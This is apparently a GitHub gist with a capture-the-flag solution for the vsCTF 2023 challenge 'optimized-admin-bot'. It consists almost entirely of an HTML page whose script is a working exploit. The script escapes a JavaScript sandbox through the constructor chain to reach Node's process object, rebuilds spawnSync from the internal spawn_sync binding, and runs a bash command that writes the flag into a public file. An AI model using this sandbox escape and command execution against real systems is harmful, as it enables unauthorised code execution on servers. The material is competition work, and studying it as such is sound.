Created
September 25, 2023 13:29
-
-
Save c0nrad/b919aa1c659a4d0f9596f5c6e1aad47f to your computer and use it in GitHub Desktop.
web/optimized-admin-bot vsCTF 2023
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<script> | |
let process = window._globalObject.constructor.constructor("return process")(); | |
let spawn_sync = process.binding("spawn_sync"); | |
normalizeSpawnArguments = function (c, b, a) { | |
if ((Array.isArray(b) ? (b = b.slice(0)) : ((a = b), (b = [])), a === undefined && (a = {}), (a = Object.assign({}, a)), a.shell)) { | |
const g = [c].concat(b).join(" "); | |
typeof a.shell === "string" ? (c = a.shell) : (c = "/bin/sh"), (b = ["-c", g]); | |
} | |
typeof a.argv0 === "string" ? b.unshift(a.argv0) : b.unshift(c); | |
var d = a.env || process.env; | |
var e = []; | |
for (var f in d) e.push(f + "=" + d[f]); | |
return { file: c, args: b, options: a, envPairs: e }; | |
}; | |
let spawnSync = function () { | |
var d = normalizeSpawnArguments.apply(null, arguments); | |
var a = d.options; | |
var c; | |
if ( | |
((a.file = d.file), | |
(a.args = d.args), | |
(a.envPairs = d.envPairs), | |
(a.stdio = [ | |
{ type: "pipe", readable: !0, writable: !1 }, | |
{ type: "pipe", readable: !1, writable: !0 }, | |
{ type: "pipe", readable: !1, writable: !0 }, | |
]), | |
a.input) | |
) { | |
var g = (a.stdio[0] = util._extend({}, a.stdio[0])); | |
g.input = a.input; | |
} | |
for (c = 0; c < a.stdio.length; c++) { | |
var e = a.stdio[c] && a.stdio[c].input; | |
if (e != null) { | |
var f = (a.stdio[c] = util._extend({}, a.stdio[c])); | |
isUint8Array(e) ? (f.input = e) : (f.input = Buffer.from(e, a.encoding)); | |
} | |
} | |
console.log(a); | |
var b = spawn_sync.spawn(a); | |
if (b.output && a.encoding && a.encoding !== "buffer") | |
for (c = 0; c < b.output.length; c++) { | |
if (!b.output[c]) continue; | |
b.output[c] = b.output[c].toString(a.encoding); | |
} | |
return ( | |
(b.stdout = b.output && b.output[1]), | |
(b.stderr = b.output && b.output[2]), | |
b.error && ((b.error = b.error + "spawnSync " + d.file), (b.error.path = d.file), (b.error.spawnargs = d.args.slice(1))), | |
b | |
); | |
}; | |
let flag = spawnSync("bash", ["-c", "/app/readflag > /app/public/index.html"]).stdout.toString(); | |
</script> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment